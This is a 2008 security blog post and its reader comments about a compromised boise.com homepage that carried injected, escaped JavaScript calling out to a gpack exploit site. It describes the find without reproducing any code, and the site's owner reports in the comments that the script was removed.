Monday, March 31, 2008

Well, there goes the Montana option

or at least the Idaho variant.

Hi folks,

One of our in-house jokes is that the only real way to be safe on the Internet is to sell all your computers and move to Montana.

Regretably, today we noticed that the innocent and bucolic sounding boise.com was showing up as carrying a link to a known exploit site.

Thinking it couldn't possibly be so, we went to look at the website thusly...



Looks innocent enough, but a view of the source reveals a chunk of escaped javascript ...



Aha! That looks suspicious.... And a look at our debug tool shows a call out to a gpack exploit site...



The web cams are actually pretty interesting, but we can't find any way to contact the site owner to tell him, so we thought we'd post it here.

Cheers

Roger

Labels:

10 Comments:

At 7:30 AM, Anonymous Anonymous said...

Isn't Boise in Idaho?

 
At 9:59 AM, Blogger Roger Thompson said...

Yes... that's why I said "the Idaho variant"

:-)

 
At 6:37 AM, Anonymous Anonymous said...

Did u try using the firefox tag and ask if you can have them contact since they have an affiliate id?

 
At 6:38 AM, Anonymous Anonymous said...

Did you try backtrack from the firefox tag and use the affiliate id?

Possible help from those folks to contact page owner?

 
At 2:29 PM, Anonymous Anonymous said...

We'll never be safe! :'(

 
At 6:12 AM, Anonymous Anonymous said...

I've been using AVG for months and ,just today, stumbled upon this very informative blog. Thank, Roger, for exploiting the "evil" sites out there. Someone has to do it. . .

Sincerely,

Your new fan in Orlando

 
At 12:58 PM, Anonymous Anonymous said...

Still active as of 4/30/08.....

 
At 5:29 AM, Blogger Lester said...

I am the owner of boise.com. I just received your email informing me of the offending script on the boise.com homepage. It has been removed and I am investigating when/how/who injected this code. Thank you for the notification.

 
At 5:59 AM, Blogger Lester said...

Oops, my mistake. I received an email sent May 3rd notifying me of the malicious code on boise.com. It referenced this blog and I erroneously thought you sent me the notification. I appreciate the heads-up Mr. Paul Broadwith sent, informing me that boise.com was hacked. Mr. Thompson, I'm not sure why you were unable to contact me as your blog post states. The public ownership information and email address for boise.com, though cryptic, is in fact correct and the email remailing address listed would have arrived to me. http://www.whois.net/whois_new.cgi?d=boise&tld=com

 
At 6:42 AM, Anonymous Anonymous said...

I contacted the site owner and have had a response today - he has confirmed that the script has been removed but I'm unable to verify at the moment.

Anybody else confirm?

 

Post a Comment

<< Home